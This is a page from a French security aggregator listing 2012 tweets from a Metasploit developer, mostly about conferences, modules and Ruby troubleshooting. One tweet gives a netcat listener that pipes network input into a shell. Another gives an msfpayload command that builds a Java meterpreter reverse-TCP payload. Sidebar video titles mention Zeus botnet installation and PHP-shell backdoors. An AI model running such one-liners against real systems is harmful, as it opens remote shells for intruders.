Contribuez à SecuObs en envoyant des bitcoins ou des dogecoins.
Nouveaux articles (fr): 1pwnthhW21zdnQ5WucjmnF3pk9puT5fDF
Amélioration du site: 1hckU85orcGCm8A9hk67391LCy4ECGJca

Contribute to SecuObs by sending bitcoins or dogecoins.

Chercher :
Newsletter :  


Revues :
- Presse
- Presse FR
- Vidéos
- Twitter
- Secuobs





Sommaires :
- Tendances
- Failles
- Virus
- Concours
- Reportages
- Acteurs
- Outils
- Breves
- Infrastructures
- Livres
- Tutoriels
- Interviews
- Podcasts
- Communiques
- USBsploit
- Commentaires


Revue Presse:
- Tous
- Francophone
- Par mot clé
- Par site
- Le tagwall


Top bi-hebdo:
- Ensemble
- Articles
- Revue
- Videos
- Twitter
- Auteurs


Articles :
- Par mot clé
- Par auteur
- Par organisme
- Le tagwall


Videos :
- Toutes
- Par mot clé
- Par site
- Le tagwall


Twitter :
- Tous
- Par mot clé
- Par compte
- Le tagwall


Commentaires :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS/XML :
- Articles
- Commentaires
- Revue
- Revue FR
- Videos
- Twitter


RSS SecuObs :
- sécurité
- exploit
- windows
- attaque
- outil
- microsoft


RSS Revue :
- security
- microsoft
- windows
- hacker
- attack
- network


RSS Videos :
- curit
- security
- biomet
- metasploit
- biometric
- cking


RSS Twitter :
- security
- linux
- botnet
- attack
- metasploit
- cisco


RSS Comments :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS OPML :
- Français
- International











Revue de presse francophone :
- Appaloosa AppDome nouent un partenariat pour accompagner les entreprises dans le déploiement et la protection des applications mobiles
- D-Link offre une avec un routeur VPN sans fil AC
- 19 mai Paris Petit-Déjeuner Coreye Développer son business à l'abri des cyberattaques
- POYNTING PRESENTE LA NOUVELLE ANTENNE OMNI-291, SPECIALE MILIEU MARITIME, CÔTIER ET MILIEU HUMIDE
- Flexera Software Les utilisateurs français de PC progressent dans l'application de correctifs logiciels, mais des défis de tailles subsistent
- Riverbed lance SD-WAN basé sur le cloud
- Fujitsu multi-récompensé VMware lui décerne plusieurs Partner Innovation Awards à l'occasion du Partner Leadership Summit
- Zscaler Private Access sécuriser l'accès à distance en supprimant les risques inhérents aux réseaux privés virtuels
- QNAP annonce la sortie de QTS 4.2.1
- Une enquête réalisée par la société de cyber sécurité F-Secure a décelé des milliers de vulnérabilités graves, potentiellement utilisables par des cyber criminels pour infiltrer l'infrastru
- Trouver le juste équilibre entre une infrastructure dédiée et cloud le dilemme de la distribution numérique
- 3 juin - Fleurance - Cybersécurité Territoires
- Cyber-assurances Seules 40 pourcents des entreprises françaises sont couvertes contre les violations de sécurité et les pertes de données
- Des étudiants de l'ESIEA inventent CheckMyHTTPS un logiciel qui vérifie que vos connexions WEB sécurisées ne sont pas interceptées
- Les produits OmniSwitch d'Alcatel-Lucent Enterprise ALE gagnent en sécurité pour lutter contre les cyber-attaques modernes

Dernier articles de SecuObs :
- DIP, solution de partage d'informations automatisée
- Sqreen, protection applicative intelligente de nouvelle génération
- Renaud Bidou (Deny All): "L'innovation dans le domaine des WAFs s'oriente vers plus de bon sens et d'intelligence, plus de flexibilité et plus d'ergonomie"
- Mises à jour en perspective pour le système Vigik
- Les russes ont-ils pwn le système AEGIS ?
- Le ministère de l'intérieur censure une conférence au Canada
- Saut d'air gap, audit de firmware et (in)sécurité mobile au programme de Cansecwest 2014
- GCHQ: Le JTRIG torpille Anonymous qui torpille le JTRIG (ou pas)
- #FIC2014: Entrée en territoire inconnu
- Le Sénat investit dans les monnaies virtuelles

Revue de presse internationale :
- VEHICLE CYBERSECURITY DOT and Industry Have Efforts Under Way, but DOT Needs to Define Its Role in Responding to a Real-world Attack
- Demand letter served on poll body over disastrous Comeleak breach
- The Minimin Aims To Be The Simplest Theremin
- Hacking group PLATINUM used Windows own patching system against it
- Hacker With Victims in 100 Nations Gets 7 Years in Prison
- HPR2018 How to make Komboucha Tea
- Circuit Bender Artist bends Fresnel Lens for Art
- FBI Director Suggests iPhone Hacking Method May Remain Secret
- 2016 Hack Miami Conference May 13-15, 2016
- 8-bit Video Wall Made From 160 Gaming Keyboards
- In An Era Of Decline, News Sites Can t Afford Poor Web Performance
- BeautifulPeople.com experiences data breach 1m affected
- Swedish Air Space Infringed, Aircraft Not Required
- Why cybercriminals attack healthcare more than any other industry
- Setting the Benchmark in the Network Security Forensics Industry

Annuaire des videos
- FUZZING ON LINE PART THREE
- Official Maltego tutorial 5 Writing your own transforms
- Official Maltego tutorial 6 Integrating with SQL DBs
- Official Maltego tutorial 3 Importing CSVs spreadsheets
- install zeus botnet
- Eloy Magalhaes
- Official Maltego tutorial 1 Google s websites
- Official Maltego tutorial 4 Social Networks
- Blind String SQL Injection
- backdoor linux root from r57 php shell VPS khg crew redc00de
- How To Attaque Pc With Back Track 5 In Arabique
- RSA Todd Schomburg talks about Roundup Ready lines available in 2013
- Nessus Diagnostics Troubleshooting
- Panda Security Vidcast Panda GateDefender Performa Parte 2 de 2
- MultiPyInjector Shellcode Injection

Revue Twitter
- RT @fpalumbo: Cisco consistently leading the way ? buys vCider to boost its distributed cloud vision #CiscoONE
- @mckeay Looks odd... not much to go on (prob some slideshow/vid app under Linux)
- [SuggestedReading] Using the HTML5 Fullscreen API for Phishing Attacks
- RT @BrianHonan: Our problems are not technical but cultural. OWASP top 10 has not changed over the years @joshcorman #RSAC
- RT @mikko: Wow. Apple kernels actually have a function called PE_i_can_has_debugger:
- [Blog Spam] Metasploit and PowerShell payloads
- PinkiePie Strikes Again, Compromises Google Chrome in Pwnium Contest at Hack in the Box: For the second time thi...
- @mikko @fslabs y'all wldn't happen to have lat/long data sets for other botnets, wld you? Doing some research (free/open info rls when done)
- RT @nickhacks: Want to crash a remote host running Snow Leopard? Just use: nmap -P0 -6 --script=targets-ipv6-multicast-mld #wishiwaskidding
- An inexpensive proxy service called is actually a front for #malware distribution -

Mini-Tagwall
Revue de presse : security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone

+ de mots clés pour la revue de presse

Annuaires des videos : curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit

+ de mots clés pour les videos

Revue Twitter : security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall

+ de mots clés pour la revue Twitter

Top bi-hebdo des articles de SecuObs
- [Ettercap – Partie 2] Ettercap par l'exemple - Man In the Middle et SSL sniffing
- [Infratech - release] version 0.6 de Bluetooth Stack Smasher
- [IDS Snort Windows – Partie 2] Installation et configuration
- [Infratech - vulnérabilité] Nouvelle version 0.8 de Bluetooth Stack Smasher
- Mises à jour en perspective pour le système Vigik
- USBDumper 2 nouvelle version nouvelles fonctions !
- EFIPW récupère automatiquement le mot de passe BIOS EFI des Macbook Pro avec processeurs Intel
- La sécurité des clés USB mise à mal par USBDUMPER
- Une faille critique de Firefox expose les utilisateurs de Tor Browser Bundle
- Installation sécurisée d'Apache Openssl, Php4, Mysql, Mod_ssl, Mod_rewrite, Mod_perl , Mod_security

Top bi-hebdo de la revue de presse
- StackScrambler and the Tale of a Packet Parsing Bug

Top bi-hebdo de l'annuaire des videos
- DC++ Botnet. How To DDos A Hub With Fake IPs.
- Comment creer un server botnet!!!!(Réseau de pc zombies)
- Defcon 14 Hard Drive Recovery Part 3

Top bi-hebdo de la revue Twitter
- RT @secureideas: I believe that all the XSS flaws announced are fixed in CVS. Will test again tomorrow if so, release 1.4.3. #BASESnort
- Currently, we do not support 100% of the advanced PDF features found in Adobe Reader... At least that's a good idea.
- VPN (google): German Foreign Office Selects Orange Business for Terrestrial Wide: Full
- @DisK0nn3cT Not really, mostly permission issues/info leak...they've had a couple of XSS vulns but nothing direct.
- Swatting phreaker swatted and heading to jail: A 19-year-old American has been sentenced to eleven years in pris..
- RT @fjserna You are not a true hacker if the calc.exe payload is not the scientific one... infosuck.org/0x0035.png

Top des articles les plus commentés
- [Metasploit 2.x – Partie 1] Introduction et présentation
- Microsoft !Exploitable un nouvel outil gratuit pour aider les développeurs à évaluer automatiquement les risques
- Webshag, un outil d'audit de serveur web
- Les navigateurs internet, des mini-systèmes d’exploitation hors de contrôle ?
- Yellowsn0w un utilitaire de déblocage SIM pour le firmware 2.2 des Iphone 3G
- CAINE un Live[CD|USB] pour faciliter la recherche légale de preuves numériques de compromission
- Nessus 4.0 placé sous le signe de la performance, de l'unification et de la personnalisation
- [Renforcement des fonctions de sécurité du noyau Linux – Partie 1] Présentation
- [IDS Snort Windows – Partie 1] Introduction aux IDS et à SNORT
- Origami pour forger, analyser et manipuler des fichiers PDF malicieux

Les Tweets pour egyp7

Si vous voulez bloquer un compte Twitter ou nous en proposer un

Menu > Elements de la revue Twitter : - l'ensemble [tous] - par mots clé [tous] - par compte [tous] - le tagwall [voir]

S'abonner au fil RSS global de la revue Twitter


Précédents / Suivants


Les Tweets filtrés pour "egyp7" (490 résultats)
S'abonner au fil RSS SecuObs pour le compte Twitter egyp7


[2012-07-10] - 20:37:04 - late last night: Yay kernel panic! now: Fucking kernel panic.

[2012-07-06] - 03:20:20 - RT @todb: Unless you're interviewing at MSFT, is there really any reason to have your resume in Word doc format? PDF, HTML, or GTFO

[2012-06-30] - 20:07:11 - RT @threatagent: Just got confirmed that my son (@ipwnstuff) I will do a talk at DEFCON Kids 2 http://t.co/u6lZfAaZ #defcon

[2012-06-27] - 07:24:49 - RT @Niki7a: Defcon welcomes @tottenkoph as a GOON. Shit just got real. #fb http://t.co/XNGHYJ1J

[2012-06-26] - 11:51:53 - RT @dave_rel1k: If your are headed to Blackhat and want go to go some amazing training -- head over to http://t.co/jTW9ko53 -- I'm teach ...

[2012-06-26] - 11:51:53 - RT @0xabad1dea: Very thoughtful essay from a 61yo Linux advocate coming out as gay. http://t.co/fFTIWW96

[2012-06-20] - 14:23:47 - RT @_juan_vazquez_: IE8 version of State-sponsored IE 0-day (CVE-2012-1889) has made it to #metasploit. Pastie: http://t.co/e6pwf9EO

[2012-06-20] - 14:23:47 - simple command to show a payload before sending it to sh: nc -l -p 1337 | tee (/bin/sh)

[2012-06-16] - 09:55:27 - A Guide to Kernel Exploitation just arrived. Wheeee!!!

[2012-06-13] - 16:41:51 - RT @_argp: The sysret kernel bug and the Linux fix from 2006 clearly demonstrate that Linux's policy of silently patching security bugs ...

[2012-06-12] - 23:07:19 - RT @hdmoore: Scanning for Vulnerable F5 BigIPs with Metasploit: https://t.co/cNCf8mxJ

[2012-06-12] - 23:07:19 - @adam757 @amberbaldet Yeah, they still try. Far too much distraction at defcon, though.

[2012-06-12] - 23:07:19 - RT @postmodern_mod3: Rubyists, stop reinventing the wheel. Research the features of existing projects before creating yet-another project.

[2012-06-10] - 04:29:21 - @AmberBaldet Nice! I've been wanting to do a 10k for a while but will have to wait til after defcon. Too much to do this summer. =/

[2012-06-09] - 11:35:10 - RT @aushack: Added 2 new @metasploit modules this week. Old, but rfp's msadc.pl '99 exploit Inc. @hdmoore s sqlrds.pl and ms02-065. #pen ...

[2012-06-09] - 11:35:10 - RT @two_pi_r: @ioerror we need to revive/modernize the era of finger me for my PGP key.

[2012-06-09] - 11:35:10 - @two_pi_r You're not the only one. @pusscat finds more 0day in a week than I will my whole life.

[2012-06-09] - 11:35:10 - RT @anestisb: @egyp7 although there exist reverse TCP payload restrictions. Have a look at this post { https://t.co/pHVKvLG8 }, might pr ...

[2012-06-09] - 11:35:10 - @jack_daniel Except there's a big warning on the #BsidesLV CFP page saying they don't want talks that were submitted to Blackhat

[2012-06-05] - 06:22:24 - @BrandonPrry Neither hand I until I did the same WTF UBUNTU that you just did. =)

[2012-06-01] - 15:42:47 - RT @csoghoian: @jeremiahg Google will turn on Do Not Track by default in Chrome approximately 30 minutes after hell freezes over.

[2012-06-01] - 15:42:47 - The web is fucking *annoying* with javascript turned on.

[2012-05-30] - 01:58:11 - @postmodern_mod3 True. But i believe the point was that the best hackers in the world are not pentesters.

[2012-05-26] - 15:32:33 - RT @briankrebs: researchers pwn Herpes botnet. scorching writeup! http://t.co/m9a7oZSy

[2012-05-26] - 15:32:33 - RT @todb: New #Metasploit update is out -- read up on using Metasploit to run PowerShell scripts here: http://t.co/eDHjR28x

[2012-05-26] - 15:32:33 - need a gem in your Metasploit install that we don't ship? /opt/metasploit*/diagnostic_shell, then gem install

[2012-05-26] - 15:32:33 - @purehate_ Is that a recent installer? ruby.h was missing from a couple.

[2012-05-26] - 15:32:33 - @purehate_ If you're missing ruby.h, I think that means you're on a 4.2 base, so, yes.

[2012-05-26] - 15:32:33 - @purehate_ It's failing to find oci8 dev headers. Try 'gem install ruby-oci8 -- --include-dir=/path/to/oracle/headers/'

[2012-05-26] - 15:32:33 - @purehate_ I don't have instantclient set up, but it worked for me with the sqlite3 gem (which has a native extension).

[2012-05-23] - 05:21:04 - RT @chris_kirsch: Top 10 Most Searched Metasploit Exploit and Auxiliary Modules http://t.co/hYWwoQr3

[2012-05-19] - 06:59:10 - RT @bonsaiviking: @egyp7 @carnal0wnage Even if you write good code, interpreter vulns. Ruby: 36, Python: 30, Perl: 22, PHP: 328 http://t ...

[2012-05-19] - 06:59:10 - RT @eromang: New blog post: Metasploit Digital Music Pad SEH overflow demo censored as copyright infringement http://t.co/IMZyc9yo #infosec

[2012-05-11] - 10:39:05 - @i0n1c they can also turn the apache socket into a shell in the same way. Metasploit has a php findsock stager for just that purpose.

[2012-05-11] - 10:39:05 - @two_pi_r I thought perl was awk + sed + drugs

[2012-05-10] - 00:48:25 - New #metasploit blog post about running executables from memory with meterpreter: http://t.co/AtkimeXJ

[2012-05-10] - 00:48:25 - RT @MarioVilas: Google Chrome - Cross-origin access using window.execScript + code execution https://t.co/8kFG0atq /via @mubix @pipesec

[2012-05-08] - 01:12:45 - Bah, screwed around for too long and didn't get hotel reservations for defcon. $499/night now. #fml

[2012-05-02] - 03:18:42 - @averagesecguy Sounds like that would make a good metasploit module. =)

[2012-04-27] - 10:00:09 - RT @moxie: The new Twitter for Android includes proxy support, enabling use with Tor (via Orbot) for circumvention and anonymity on unro ...

[2012-04-24] - 21:04:16 - RT @crazygoodcookie: Metasploit 4.3 Released: Automation! Yay! Modules! Yay! http://t.co/foNmo9ck #metasploit

[2012-04-14] - 06:50:49 - RT @mikko: Don't tell me how to enable JavaScript. Tell me why I should enable it. http://t.co/L8awPyRN

[2012-04-11] - 01:42:40 - RT @travisgoodspeed: I'm in the mood to send gift baskets of GoodFET boards to hackerspaces. Email me your shipping address if you'd lik ...

[2012-04-11] - 01:42:40 - @bindshell_ Who needs bugs? It's UDP based, just spam it with spoofed packets til you get a shell

[2012-04-09] - 01:57:58 - RT @EttercapProject: We still need coders. Working on the new SSLStrip portion of ettercap for a Defcon release. Who's in? Plz retweet ;)

[2012-04-05] - 07:06:55 - RT @jcran: I'm hiring for Metasploit. Set up pentest scenarios hack on metasploit full-time! dm / email (jcran@metasploit) for more info!

[2012-04-04] - 07:59:04 - Another argument for disabling javascript: http://t.co/yrNdYuIU says i'm 1 among 28,657 with it off. *Unique* out of 2 million with it on.

[2012-04-01] - 21:13:11 - Metasploit is dropping support for legacy addresses: http://t.co/n8YSkqyq

[2012-03-31] - 06:34:03 - RT @todb: The ripping tale of @_sinn3r and @_juan_vazquez_ 's new #Metasploit module for Java CVE-2012-0507 detailed here: http://t.co/t ...

[2012-03-28] - 22:53:13 - RT @todb: Are you ready kids? #Metasploit is updated, now with a fancy new DNS-based payload smuggler from @corelanc0d3r http://t.co/eeO ...

[2012-03-28] - 22:53:13 - msfpayload java/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=443 R met.jar # run with java -jar met.jar

[2012-03-28] - 22:53:13 - RT @matthias_kaiser: @egyp7 java meterpereter works also on IBM AIX with IBM JRE ( J9 vm) ! I recently used that way on a pentest


Précédents / Suivants


S'abonner au fil RSS global de la revue Twitter

Menu > Elements de la revue Twitter : - l'ensemble [tous] - par mots clé [tous] - par compte [tous] - le tagwall [voir]




SecuToolBox :

Mini-Tagwall des articles publiés sur SecuObs :

Mini-Tagwall de l'annuaire video :

Mini-Tagwall des articles de la revue de presse :

Mini-Tagwall des Tweets de la revue Twitter :